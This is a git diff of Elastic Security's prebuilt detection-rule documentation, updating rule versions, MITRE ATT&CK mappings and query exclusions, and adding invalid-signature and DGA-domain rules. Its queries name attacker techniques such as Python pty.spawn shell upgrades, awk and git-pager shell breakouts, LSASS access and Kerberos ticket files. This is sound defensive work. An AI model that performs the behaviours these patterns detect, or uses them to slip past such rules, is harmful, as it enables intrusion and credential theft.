a/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-user-password-reset-or-unlock-attempts.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/high-number-of-okta-user-password-reset-or-unlock-attempts.asciidoc @@ -32,7 +32,7 @@ Identifies a high number of Okta user password reset or account unlock attempts. * Data Source: Okta * Tactic: Defense Evasion -*Version*: 106 +*Version*: 207 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/high-number-of-process-terminations.asciidoc b/docs/detections/prebuilt-rules/rule-details/high-number-of-process-terminations.asciidoc index d1ec96d37e..7e898ce380 100644 --- a/docs/detections/prebuilt-rules/rule-details/high-number-of-process-terminations.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/high-number-of-process-terminations.asciidoc @@ -32,7 +32,7 @@ This rule identifies a high number (10) of process terminations via pkill from t * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 108 +*Version*: 109 *Rule authors*: @@ -79,6 +79,7 @@ This rule identifies a high number (10) of process terminations via pkill from t - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/hosts-file-modified.asciidoc b/docs/detections/prebuilt-rules/rule-details/hosts-file-modified.asciidoc index a855b25b6f..992188c319 100644 --- a/docs/detections/prebuilt-rules/rule-details/hosts-file-modified.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/hosts-file-modified.asciidoc @@ -37,7 +37,7 @@ The hosts file on endpoints is used to control manual IP address to hostname res * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -94,7 +94,8 @@ any where miss this, which is the purpose of the process + command line args logic below */ ( event.category == "file" and event.type in ("change", "creation") and - file.path : ("/private/etc/hosts", "/etc/hosts", "?:\\Windows\\System32\\drivers\\etc\\hosts") + file.path : ("/private/etc/hosts", "/etc/hosts", "?:\\Windows\\System32\\drivers\\etc\\hosts") and + not process.name in ("dockerd", "rootlesskit", "podman", "crio") ) or @@ -102,7 +103,8 @@ any where ( event.category == "process" and event.type in ("start") and process.name in ("nano", "vim", "vi", "emacs", "echo", "sed") and - process.args : ("/etc/hosts") + process.args : ("/etc/hosts") and + not process.parent.name in ("dhclient-script", "google_set_hostname") ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/hping-process-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/hping-process-activity.asciidoc index ee5536c39c..1b9e613c7b 100644 --- a/docs/detections/prebuilt-rules/rule-details/hping-process-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/hping-process-activity.asciidoc @@ -34,7 +34,7 @@ Hping ran on a Linux host. Hping is a FOSS command-line packet analyzer and has * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/image-file-execution-options-injection.asciidoc b/docs/detections/prebuilt-rules/rule-details/image-file-execution-options-injection.asciidoc index 9ba7d91a2a..1181ca393c 100644 --- a/docs/detections/prebuilt-rules/rule-details/image-file-execution-options-injection.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/image-file-execution-options-injection.asciidoc @@ -30,10 +30,11 @@ The Debugger and SilentProcessExit registry keys can allow an adversary to inter * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -77,3 +78,11 @@ registry where host.os.type == "windows" and length(registry.data.strings) > 0 a ** Name: Image File Execution Options Injection ** ID: T1546.012 ** Reference URL: https://attack.mitre.org/techniques/T1546/012/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/image-loaded-with-invalid-signature.asciidoc b/docs/detections/prebuilt-rules/rule-details/image-loaded-with-invalid-signature.asciidoc new file mode 100644 index 0000000000..956d15ac4c --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/image-loaded-with-invalid-signature.asciidoc @@ -0,0 +1,70 @@ +[[image-loaded-with-invalid-signature]] +=== Image Loaded with Invalid Signature + +Identifies binaries that are loaded and with an invalid code signature. This may indicate an attempt to masquerade as a signed binary. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 60m + +*Searches indices from*: now-119m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Rule Type: BBR +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +library where host.os.type == "windows" and event.action == "load" and + dll.code_signature.status : ("errorUntrustedRoot", "errorBadDigest", "errorUntrustedRoot") and + (dll.Ext.relative_file_creation_time <= 500 or dll.Ext.relative_file_name_modify_time <= 500) and + not startswith~(dll.name, process.name) and + not dll.path : ( + "?:\\Windows\\System32\\DriverStore\\FileRepository\\*" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc b/docs/detections/prebuilt-rules/rule-details/inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc index a485347315..9cc0bbb3a4 100644 --- a/docs/detections/prebuilt-rules/rule-details/inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc @@ -31,7 +31,7 @@ Identifies Elasticsearch nodes that do not have Transport Layer Security (TLS), * Tactic: Initial Access * Domain: Endpoint -*Version*: 103 +*Version*: 104 *Rule authors*: @@ -53,8 +53,8 @@ Identifies Elasticsearch nodes that do not have Transport Layer Security (TLS), [source, js] ---------------------------------- -(event.dataset: network_traffic.http or (event.category: network_traffic and network.protocol: http)) and - status:OK and destination.port:9200 and network.direction:inbound and NOT http.response.headers.content-type:"image/x-icon" and not +(event.dataset: network_traffic.http OR (event.category: network_traffic AND network.protocol: http)) AND + status:OK AND destination.port:9200 AND network.direction:inbound AND NOT http.response.headers.content-type:"image/x-icon" AND NOT _exists_:http.request.headers.authorization ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/incoming-dcom-lateral-movement-with-mmc.asciidoc b/docs/detections/prebuilt-rules/rule-details/incoming-dcom-lateral-movement-with-mmc.asciidoc index bdf25d3a2f..ee13edaf68 100644 --- a/docs/detections/prebuilt-rules/rule-details/incoming-dcom-lateral-movement-with-mmc.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/incoming-dcom-lateral-movement-with-mmc.asciidoc @@ -31,9 +31,10 @@ Identifies the use of Distributed Component Object Model (DCOM) to run commands * OS: Windows * Use Case: Threat Detection * Tactic: Lateral Movement +* Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -71,3 +72,15 @@ sequence by host.id with maxspan=1m ** Name: Distributed Component Object Model ** ID: T1021.003 ** Reference URL: https://attack.mitre.org/techniques/T1021/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: MMC +** ID: T1218.014 +** Reference URL: https://attack.mitre.org/techniques/T1218/014/ diff --git a/docs/detections/prebuilt-rules/rule-details/incoming-execution-via-powershell-remoting.asciidoc b/docs/detections/prebuilt-rules/rule-details/incoming-execution-via-powershell-remoting.asciidoc index 330aad57ec..4b8273e6e7 100644 --- a/docs/detections/prebuilt-rules/rule-details/incoming-execution-via-powershell-remoting.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/incoming-execution-via-powershell-remoting.asciidoc @@ -31,9 +31,10 @@ Identifies remote execution via Windows PowerShell remoting. Windows PowerShell * OS: Windows * Use Case: Threat Detection * Tactic: Lateral Movement +* Tactic: Execution * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -69,3 +70,15 @@ sequence by host.id with maxspan = 30s ** Name: Windows Remote Management ** ID: T1021.006 ** Reference URL: https://attack.mitre.org/techniques/T1021/006/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/installation-of-security-support-provider.asciidoc b/docs/detections/prebuilt-rules/rule-details/installation-of-security-support-provider.asciidoc index 178021a263..38e438a08e 100644 --- a/docs/detections/prebuilt-rules/rule-details/installation-of-security-support-provider.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/installation-of-security-support-provider.asciidoc @@ -30,10 +30,11 @@ Identifies registry modifications related to the Windows Security Support Provid * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -80,3 +81,11 @@ registry where host.os.type == "windows" and ** Name: Security Support Provider ** ID: T1547.005 ** Reference URL: https://attack.mitre.org/techniques/T1547/005/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-perl.asciidoc b/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-perl.asciidoc index d5868a04da..5038815ada 100644 --- a/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-perl.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-perl.asciidoc @@ -32,7 +32,7 @@ Identifies when a terminal (tty) is spawned via Perl. Attackers may upgrade a si * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-python.asciidoc b/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-python.asciidoc index 690fb1f9ca..7c3794afd8 100644 --- a/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-python.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/interactive-terminal-spawned-via-python.asciidoc @@ -31,7 +31,7 @@ Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -47,10 +47,10 @@ Identifies when a terminal (tty) is spawned via Python. Attackers may upgrade a ---------------------------------- process where host.os.type == "linux" and event.action in ("exec", "exec_event") and ( - (process.parent.name : "python*" and process.name : "*sh" and process.parent.args_count >= 3 and - process.parent.args : "*pty.spawn*" and process.parent.args : "-c") or - (process.parent.name : "python*" and process.name : "*sh" and process.args : "*sh" and process.args_count == 1 - and process.parent.args_count == 1) + (process.parent.name : "python*" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", + "fish") and process.parent.args_count >= 3 and process.parent.args : "*pty.spawn*" and process.parent.args : "-c") or + (process.parent.name : "python*" and process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", + "fish") and process.args : "*sh" and process.args_count == 1 and process.parent.args_count == 1) ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/kerberos-pre-authentication-disabled-for-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/kerberos-pre-authentication-disabled-for-user.asciidoc index 97bb4a4807..91b52c32cf 100644 --- a/docs/detections/prebuilt-rules/rule-details/kerberos-pre-authentication-disabled-for-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kerberos-pre-authentication-disabled-for-user.asciidoc @@ -33,11 +33,13 @@ Identifies the modification of an account's Kerberos pre-authentication options. * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Defense Evasion +* Tactic: Privilege Escalation * Resources: Investigation Guide * Use Case: Active Directory Monitoring * Data Source: Active Directory -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -103,3 +105,23 @@ event.code:4738 and winlog.api:"wineventlog" and message:"'Don't Require Preauth ** Name: AS-REP Roasting ** ID: T1558.004 ** Reference URL: https://attack.mitre.org/techniques/T1558/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/kernel-load-or-unload-via-kexec-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/kernel-load-or-unload-via-kexec-detected.asciidoc index 05ab43a76d..34448a71bf 100644 --- a/docs/detections/prebuilt-rules/rule-details/kernel-load-or-unload-via-kexec-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kernel-load-or-unload-via-kexec-detected.asciidoc @@ -35,7 +35,7 @@ This detection rule identifies the usage of kexec, helping to uncover unauthoriz * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/kernel-module-load-via-insmod.asciidoc b/docs/detections/prebuilt-rules/rule-details/kernel-module-load-via-insmod.asciidoc index 5a737bf7dd..ffecd6d10d 100644 --- a/docs/detections/prebuilt-rules/rule-details/kernel-module-load-via-insmod.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kernel-module-load-via-insmod.asciidoc @@ -1,5 +1,5 @@ [[kernel-module-load-via-insmod]] -=== Kernel module load via insmod +=== Kernel Module Load via insmod Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior. @@ -34,7 +34,7 @@ Detects the use of the insmod binary to load a Linux kernel object file. Threat * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -49,6 +49,7 @@ Detects the use of the insmod binary to load a Linux kernel object file. Threat [source, js] ---------------------------------- process where host.os.type == "linux" and event.type == "start" and process.name == "insmod" and process.args : "*.ko" +and not process.parent.name in ("cisco-amp-helper", "ksplice-apply") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/kernel-module-removal.asciidoc b/docs/detections/prebuilt-rules/rule-details/kernel-module-removal.asciidoc index d0ef43bd5d..d3dbd1e29f 100644 --- a/docs/detections/prebuilt-rules/rule-details/kernel-module-removal.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kernel-module-removal.asciidoc @@ -33,7 +33,7 @@ Kernel modules are pieces of code that can be loaded and unloaded into the kerne * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/kirbi-file-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/kirbi-file-creation.asciidoc index 576455b5c1..5d127729cc 100644 --- a/docs/detections/prebuilt-rules/rule-details/kirbi-file-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/kirbi-file-creation.asciidoc @@ -30,7 +30,7 @@ Identifies the creation of .kirbi files. The creation of this kind of file is an * Data Source: Elastic Defend * Rule Type: BBR -*Version*: 1 +*Version*: 2 *Rule authors*: @@ -62,15 +62,3 @@ file where host.os.type == "windows" and event.type == "creation" and file.exten ** Name: Steal or Forge Kerberos Tickets ** ID: T1558 ** Reference URL: https://attack.mitre.org/techniques/T1558/ -* Tactic: -** Name: Execution -** ID: TA0002 -** Reference URL: https://attack.mitre.org/tactics/TA0002/ -* Technique: -** Name: Command and Scripting Interpreter -** ID: T1059 -** Reference URL: https://attack.mitre.org/techniques/T1059/ -* Sub-technique: -** Name: PowerShell -** ID: T1059.001 -** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/lateral-movement-via-startup-folder.asciidoc b/docs/detections/prebuilt-rules/rule-details/lateral-movement-via-startup-folder.asciidoc index 1ae8d9f327..8eaa2c3a5b 100644 --- a/docs/detections/prebuilt-rules/rule-details/lateral-movement-via-startup-folder.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/lateral-movement-via-startup-folder.asciidoc @@ -35,7 +35,7 @@ Identifies suspicious file creations in the startup folder of a remote system. A * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -77,6 +77,10 @@ file where host.os.type == "windows" and event.type in ("creation", "change") an ** Name: Remote Services ** ID: T1021 ** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Remote Desktop Protocol +** ID: T1021.001 +** Reference URL: https://attack.mitre.org/techniques/T1021/001/ * Tactic: ** Name: Persistence ** ID: TA0003 diff --git a/docs/detections/prebuilt-rules/rule-details/linux-init-pid-1-secret-dump-via-gdb.asciidoc b/docs/detections/prebuilt-rules/rule-details/linux-init-pid-1-secret-dump-via-gdb.asciidoc index 69039f0e33..e40beea651 100644 --- a/docs/detections/prebuilt-rules/rule-details/linux-init-pid-1-secret-dump-via-gdb.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/linux-init-pid-1-secret-dump-via-gdb.asciidoc @@ -32,7 +32,7 @@ This rule monitors for the potential memory dump of the init process (PID 1) thr * Tactic: Credential Access * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/linux-restricted-shell-breakout-via-linux-binary-s.asciidoc b/docs/detections/prebuilt-rules/rule-details/linux-restricted-shell-breakout-via-linux-binary-s.asciidoc index 19025309b9..0ecc2ab733 100644 --- a/docs/detections/prebuilt-rules/rule-details/linux-restricted-shell-breakout-via-linux-binary-s.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/linux-restricted-shell-breakout-via-linux-binary-s.asciidoc @@ -56,7 +56,7 @@ Identifies the abuse of a Linux binary to break out of a restricted shell or env * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 109 +*Version*: 110 *Rule authors*: @@ -116,38 +116,6 @@ Initiate the incident response process based on the outcome of the triage. - Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). - -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. -- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -Session View uses process data collected by the Elastic Defend integration, but this data is not always collected by default. Session View is available on enterprise subscription for versions 8.3 and above. -#### To confirm that Session View data is enabled: -- Go to Manage → Policies, and edit one or more of your Elastic Defend integration policies. -- Select the Policy settings tab, then scroll down to the Linux event collection section near the bottom. -- Check the box for Process events, and turn on the Include session data toggle. -- If you want to include file and network alerts in Session View, check the boxes for Network and File events. -- If you want to enable terminal output capture, turn on the Capture terminal output toggle. -For more information about the additional fields collected when this setting is enabled and -the usage of Session View for Analysis refer to the {security-guide}/security/current/session-view.html[helper guide]. ---------------------------------- ==== Rule query @@ -161,7 +129,7 @@ process where host.os.type == "linux" and event.type == "start" and (process.name == "capsh" and process.args == "--") or /* launching shells from unusual parents or parent+arg combos */ - (process.name : "*sh" and ( + (process.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and ( (process.parent.name : "*awk" and process.parent.args : "BEGIN {system(*)}") or (process.parent.name == "git" and process.parent.args : ("*PAGER*", "!*sh", "exec *sh") or process.args : ("*PAGER*", "!*sh", "exec *sh") and not process.name == "ssh" ) or diff --git a/docs/detections/prebuilt-rules/rule-details/linux-user-added-to-privileged-group.asciidoc b/docs/detections/prebuilt-rules/rule-details/linux-user-added-to-privileged-group.asciidoc index b0835b2f44..4da73e9689 100644 --- a/docs/detections/prebuilt-rules/rule-details/linux-user-added-to-privileged-group.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/linux-user-added-to-privileged-group.asciidoc @@ -32,7 +32,7 @@ Identifies attempts to add a user to a privileged group. Attackers may add users * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -92,6 +92,7 @@ This rule identifies the usages of `usermod`, `adduser` and `gpasswd` to assign - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query diff --git a/docs/detections/prebuilt-rules/rule-details/local-account-tokenfilter-policy-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/local-account-tokenfilter-policy-disabled.asciidoc index d4f28d1a3b..151c7c9709 100644 --- a/docs/detections/prebuilt-rules/rule-details/local-account-tokenfilter-policy-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/local-account-tokenfilter-policy-disabled.asciidoc @@ -34,11 +34,11 @@ Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion -* Tactic: Privilege Escalation +* Tactic: Lateral Movement * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: @@ -69,15 +69,19 @@ registry where host.os.type == "windows" and registry.path : ( ** Name: Modify Registry ** ID: T1112 ** Reference URL: https://attack.mitre.org/techniques/T1112/ +* Technique: +** Name: Impair Defenses +** ID: T1562 +** Reference URL: https://attack.mitre.org/techniques/T1562/ * Tactic: -** Name: Privilege Escalation -** ID: TA0004 -** Reference URL: https://attack.mitre.org/tactics/TA0004/ +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ * Technique: -** Name: Valid Accounts -** ID: T1078 -** Reference URL: https://attack.mitre.org/techniques/T1078/ +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ * Sub-technique: -** Name: Local Accounts -** ID: T1078.003 -** Reference URL: https://attack.mitre.org/techniques/T1078/003/ +** Name: Pass the Hash +** ID: T1550.002 +** Reference URL: https://attack.mitre.org/techniques/T1550/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/lsass-process-access-via-windows-api.asciidoc b/docs/detections/prebuilt-rules/rule-details/lsass-process-access-via-windows-api.asciidoc index 5841f8e68b..c07ce03182 100644 --- a/docs/detections/prebuilt-rules/rule-details/lsass-process-access-via-windows-api.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/lsass-process-access-via-windows-api.asciidoc @@ -29,9 +29,10 @@ Identifies access attempts to the LSASS handle, which may indicate an attempt to * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Execution * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -89,3 +90,11 @@ api where host.os.type == "windows" and ** Name: LSASS Memory ** ID: T1003.001 ** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc new file mode 100644 index 0000000000..d5f88325a2 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc @@ -0,0 +1,77 @@ +[[machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain]] +=== Machine Learning Detected a DNS Request Predicted to be a DGA Domain + +A supervised machine learning model has identified a DNS question name that is predicted to be the result of a Domain Generation Algorithm (DGA), which could indicate command and control network activity. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* logs-network_traffic.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Domain: Network +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +ml_is_dga.malicious_prediction:1 and not dns.question.registered_domain:avsvmcloud.com + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc new file mode 100644 index 0000000000..c1395864ff --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc @@ -0,0 +1,77 @@ +[[machine-learning-detected-a-dns-request-with-a-high-dga-probability-score]] +=== Machine Learning Detected a DNS Request With a High DGA Probability Score + +A supervised machine learning model has identified a DNS question name with a high probability of sourcing from a Domain Generation Algorithm (DGA), which could indicate command and control network activity. + +*Rule type*: query + +*Rule indices*: + +* logs-endpoint.events.* +* logs-network_traffic.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-10m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Domain: Network +* Domain: Endpoint +* Data Source: Elastic Defend +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +ml_is_dga.malicious_probability > 0.98 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 